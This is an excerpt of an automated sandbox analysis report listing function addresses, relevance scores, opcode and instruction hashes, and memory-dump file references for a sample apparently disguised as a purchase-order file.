Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d33e95259c4325a8f49078737816a6cf6421a71673515d6276c64119f7cbcf
Instruction ID: b7b460fd574f90aa86963a3d1ae06f6e7a54163962bccfc78ef378eff664fddb
Opcode Fuzzy Hash: c5d33e95259c4325a8f49078737816a6cf6421a71673515d6276c64119f7cbcf
Instruction Fuzzy Hash: 4911C172A00205EFCB61CF59C590A5ABBF8EFD9790F1180BDD9859B311D636DE00DBA4

Function 010CA464 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction ID: 1120adf6999a5bb90afddcf8ec1467026e078a023cdb3facbb6b2b94fa404474
Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
Instruction Fuzzy Hash: B311C432A00919EFDB19CF58CC15B9DFBF5EF84610F048269E89697380EA75AD51CB84

Function 010009F0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
Instruction ID: 0a3401e0f7ab2fd08d5764197b9923feee57a55bd8ec58263c40e8054d3d24c0
Opcode Fuzzy Hash: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
Instruction Fuzzy Hash: 5C2106B5A00B059FD3A0CF29D480B56BBF4FB48B10F10892EE98AC7B40E771E854CB90

Function 0108E461 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction ID: 7c1f72b956b15be5d534dc6e9b497a47a2fd4dac724a7a766296201472d25a22
Opcode Fuzzy Hash: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction Fuzzy Hash: 9C119E32608605AFE731AF4CCC40B9ABBE5FB84354F0590A8EACD9B160EB31DD41C790

Function 0102270D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920e251194c49672f5bf4d9f47cd738577c7c9bc029c876446169794a8aff73a
Instruction ID: d405dc8979de90c32b72d7b6d3c11005d53af468d82ca6227977ddc37ff2c174
Opcode Fuzzy Hash: 920e251194c49672f5bf4d9f47cd738577c7c9bc029c876446169794a8aff73a
Instruction Fuzzy Hash: 7C012635349254DBE326B6AED898F6B7BDDFF80250F0904A6F9818B291DB54DC00C221

Function 010045B0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74edc353a46c35d823aa0ea85ab5f453e852e76894355b21e6f82dcfd9ea9f08
Instruction ID: c6d79853e7b9ffcb9c1e50a624f76b4b75b2fcdddd825f2ca1f3382ac48385d1
Opcode Fuzzy Hash: 74edc353a46c35d823aa0ea85ab5f453e852e76894355b21e6f82dcfd9ea9f08
Instruction Fuzzy Hash: F9110672200784EFE722DF59DD44B5A7BE4EB88765F044115FA84CB6C0D370E940CB59

Function 01036540 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafa861827747550e27c0cc016533dfa4d3d3bec6d4f4c05519bcbf3d05ae620
Instruction ID: 95ed32849de3e5f9f3ba556d230831fa79f87b1fa200ebd52b7d3532c8e44c0f
Opcode Fuzzy Hash: fafa861827747550e27c0cc016533dfa4d3d3bec6d4f4c05519bcbf3d05ae620
Instruction Fuzzy Hash: F0117072901715BBDB219B59C980B9EFBFCFF88710F510465DA8167284D775AA018B90

Function 0102E94E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd00f720cd2f42c963175b70c39817996f3a18d3105e1f1772dbc849954122a
Instruction ID: 569f7d6cb4cecd72f0f33f010760447c922dcddaedc08069d0047e4684d9540c
Opcode Fuzzy Hash: 5bd00f720cd2f42c963175b70c39817996f3a18d3105e1f1772dbc849954122a
Instruction Fuzzy Hash: 4601DE712011099FD326DB19D805F56BBE9EFC1324F2481AEE2898BAA4C7B4DC42CB90

Function 0102E45E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction ID: c0dd5c078af95f9022011e05d0a9607197b49148334a54be5741ffccb27348ca
Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction Fuzzy Hash: 0C11A132685AA28FE763871DD964B697BDCBF41B68F1900E0DDC08B682DB28D841C750

Function 0108E3DD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
Instruction ID: c8217794171cbc4dbbe262c7b46cf33c219017e412550b29c065d70b25ac6d1f
Opcode Fuzzy Hash: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
Instruction Fuzzy Hash: DB01D232709101AFE721AF0CCC00B9A7AE5EB84354F098064EACC9B2A0EB75DD41D794

Function 00FFA200 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction ID: 74dc1b94d1edb1a9df12692f29330dc34e76afac5f583c21bb49954e4d2eb9f3
Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
Instruction Fuzzy Hash: D60126B2A057199BCB308F15D840A727BE4EF56770700852DFD998B2A0C731D900EBA1

Function 01006179 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50fdd6df65ff00b5463cd8ac4531576d392fa9190fa4188220f7d4ca6e634b86
Instruction ID: 282e30324672130afb5e64300ce8d73c5b93650fb99fc0c0c11f751e6c945456
Opcode Fuzzy Hash: 50fdd6df65ff00b5463cd8ac4531576d392fa9190fa4188220f7d4ca6e634b86
Instruction Fuzzy Hash: E311AC70641218ABEB72EB24CC82FE872B9BF04710F1441E4B799A60E0DB319E91CF84

Function 01036CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction ID: b58e62074317c526b7fbf74fc5f1ee7acc9057385d331479532a488ec36bea18
Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
Instruction Fuzzy Hash: CF012871A042557BDB25AB55C81CBDF7FACEBC0710F154059AA865B280D675DAC0C3A1

Function 01096090 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8422a05e52f147c7e92b32092fe40fe47aa7f3a4dd26f3a23726ed65a7e95a0c
Instruction ID: eb35423dff27c2d75a23f5942ea1f004928ec0ae3901d073d9aeb661171e424e
Opcode Fuzzy Hash: 8422a05e52f147c7e92b32092fe40fe47aa7f3a4dd26f3a23726ed65a7e95a0c
Instruction Fuzzy Hash: 0211E5726041469FDB11CF58D850BA6BBF5FB8A304F088159E9848B312DB33E881D7A0

Function 010AE5E0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db5caebb0ccf213daabe4f4ebf52ff609db2cafaaa10bc8b41649b42fa67aa4
Instruction ID: 1462fe4bf77f7d63aa3d04a698d81e19f6db2858d52867fa525722974a6ac6af
Opcode Fuzzy Hash: 0db5caebb0ccf213daabe4f4ebf52ff609db2cafaaa10bc8b41649b42fa67aa4
Instruction Fuzzy Hash: 310147311402109BCB32AB98C440DBAB7F9FF667E0B5488AEE6C50B540CB35DC41CB90

Function 0108C490 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfe15edcd1361e79844054d5b45e6d788f2c604646a7eab278057f102f93751
Instruction ID: 165dfeef81b5454272c0a59014aa1cdc7fba0ecf8915c5cad530246c87a2a33d
Opcode Fuzzy Hash: 5bfe15edcd1361e79844054d5b45e6d788f2c604646a7eab278057f102f93751
Instruction Fuzzy Hash: 9011E8B1A00259AFCB04DFADD581AAEBBF8FF58210F10406AB945E7341D674AA418BA4

Function 01042010 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424294afc56be3385a333559b1997c55cc879f58a4a2f0fdd2c2036a73a84fbc
Instruction ID: ce9c986927b75b9ef16c48682bee4fe59e55bd1fe02c8e07c24c83fb3d8530ed
Opcode Fuzzy Hash: 424294afc56be3385a333559b1997c55cc879f58a4a2f0fdd2c2036a73a84fbc
Instruction Fuzzy Hash: 9A11C0B0A00209EFDB10DF64D890FAE7BB5EB48314F0040A9F9519B281DA35AD15CB90

Function 01096550 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42299fa7cf3fa55c650b486c34cba78dd910b3b1a2b3c0cc6f0739aaea7d34f1
Instruction ID: a50d8c98e42a66c38c5d464d09636adb073b4d89bcd62c93f0cacd8d2ee10a5d
Opcode Fuzzy Hash: 42299fa7cf3fa55c650b486c34cba78dd910b3b1a2b3c0cc6f0739aaea7d34f1
Instruction Fuzzy Hash: AD01FC322146119FCB20DF78C898AABB7E8EF94664F100269F9A9872C4D735D901C7D1

Function 0103E4EF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76f64e42b20527c80c853c58d7e667ffc1e0b1fed42014ef8993ca63edd13b3
Instruction ID: 0279b8729a97bbe005f33f1254bdf9007887905dd13fe1c772b8ca38b8c506dc
Opcode Fuzzy Hash: c76f64e42b20527c80c853c58d7e667ffc1e0b1fed42014ef8993ca63edd13b3
Instruction Fuzzy Hash: 7501D671200646BFD721ABB9CD80E97B7BCFFA5764F100229B64587951DB68EC01C6E4

Function 0108C0E0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2596c0bd809c122c8daf412973bc95d9fd90a00f32cf40b3bfee6426223eb47e
Instruction ID: e7cbff89e45f914b4d11d986f8aebc507863da425ddcac5616d5ef5514f6216e
Opcode Fuzzy Hash: 2596c0bd809c122c8daf412973bc95d9fd90a00f32cf40b3bfee6426223eb47e
Instruction Fuzzy Hash: 03115B70A00209EFDF15EF68C990AEEBBB9EB48304F004099B98197340DA35E911CBA0

Function 0108C5FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4275e37a465df173a1c3c58da67645a826cce7350831c208b9c4f5037642c2b4
Instruction ID: e89ed7a69b8b3c509623d3528523cd7bc6f9c0d8dd1f1050d99ef4fdb0bb2679
Opcode Fuzzy Hash: 4275e37a465df173a1c3c58da67645a826cce7350831c208b9c4f5037642c2b4
Instruction Fuzzy Hash: 471139B16083049FC700DF69D541A9BBBF8EF98714F00896EB998D7391E634E910CBA2

Function 010D4600 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction ID: 2b9646eab4881c86871df8088e1bfa03eb8317455912f9f89c5cfb3217f50253
Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction Fuzzy Hash: 0401D432200701DFD725DA69D840F97B7EAFBC9610F144459E693CBE50DA70F880C791

Function 0108C691 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab55a4e70302dc075b29ec57ed5c0e90ee205d971c833cbf8324603af7642c9
Instruction ID: cd2d5597ecd500c37eb26efb18412bc91a9b1cfc5ddc7cac3ff4267651bac013
Opcode Fuzzy Hash: 1ab55a4e70302dc075b29ec57ed5c0e90ee205d971c833cbf8324603af7642c9
Instruction Fuzzy Hash: AC117CB16183049FC300DF69D441A8BBBF4EF98710F00856EB998D7350D630E900CBA2

Function 0103415F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf5860ddb1076a30cb970d2512dad42e4dc04713859c094520f46922aa3c004
Instruction ID: 63fd2f1806c818f825a52947fa1138c07d4972c18a68975461e330aa305e09cc
Opcode Fuzzy Hash: bdf5860ddb1076a30cb970d2512dad42e4dc04713859c094520f46922aa3c004
Instruction Fuzzy Hash: 1301D6366046019BC365CF7DD618566BFEDFB9931470405A9E589CBB14D332E901C714

Function 00FF821B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec728b73a7e6fbbabad4c2338451b850c99662a5cce2de2a02cac3978bf5e2bc
Instruction ID: 4923bd76d70d91e8ed163c6d2954196393eb7d9cfde5f84405f06f2e5a77f9fc
Opcode Fuzzy Hash: ec728b73a7e6fbbabad4c2338451b850c99662a5cce2de2a02cac3978bf5e2bc
Instruction Fuzzy Hash: 4501D431704508DBC714EF65DC05AAEB3AAEF80760B148029AA41E7250DE70ED03D650

Function 010AE6D0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f729ded069fd9cd4b32e0ad9c8b723c74f70a0bb882057b87676e5bc974903f2
Instruction ID: 462936191be3b5486ae5bc5f7a0ad875a9a997eae9be4cadc3e9989e4a45fbd9
Opcode Fuzzy Hash: f729ded069fd9cd4b32e0ad9c8b723c74f70a0bb882057b87676e5bc974903f2
Instruction Fuzzy Hash: 2C01F271280301ABD331AF55D801F4ABEA8FB51B60F50042EB7C48F690C6B5E840C784

Function 0108488F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80511f7500d5559e41cb87721d6fdd32e3a1167426eaca66fb0352364342ec5c
Instruction ID: d352908df70d11a14dd7fda8f5f8986b1a5fe1d39ee578615813f445ce4d456d
Opcode Fuzzy Hash: 80511f7500d5559e41cb87721d6fdd32e3a1167426eaca66fb0352364342ec5c
Instruction Fuzzy Hash: 5D01A272B00306AFEB21AF9DD9C1B9DBBF8BB54760F110069EAC0D7242D7B5D9408790

Function 010024A2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8debc31e6622fe07d853fd368b1a6cdc30096dd947ae83dc664459f2ed742a2f
Instruction ID: 8bc36e1fa67fd165d908de51b28d9011cd1d440c771d5bc372c251fad5ca88e1
Opcode Fuzzy Hash: 8debc31e6622fe07d853fd368b1a6cdc30096dd947ae83dc664459f2ed742a2f
Instruction Fuzzy Hash: 98F0F432641A61ABD732DF5A8D84F47BEE9FBC4A60F114068AA859B280CA24DC01D7A0

Function 010D4AE8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6dabb4170a08c9160ebce8af341958aedd18f0bfeef1449cc2b5ab7776444e0
Instruction ID: 53b1c4e58f03cb73eba8d2061999caab18caf4df06fb0a78a9c1a607dcb80037
Opcode Fuzzy Hash: b6dabb4170a08c9160ebce8af341958aedd18f0bfeef1449cc2b5ab7776444e0
Instruction Fuzzy Hash: 640129B1A00219ABCB04DFA9D841ADEB7F8FF58314F10446AE951E7340D674DA008BA4

Function 00FFC2B0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

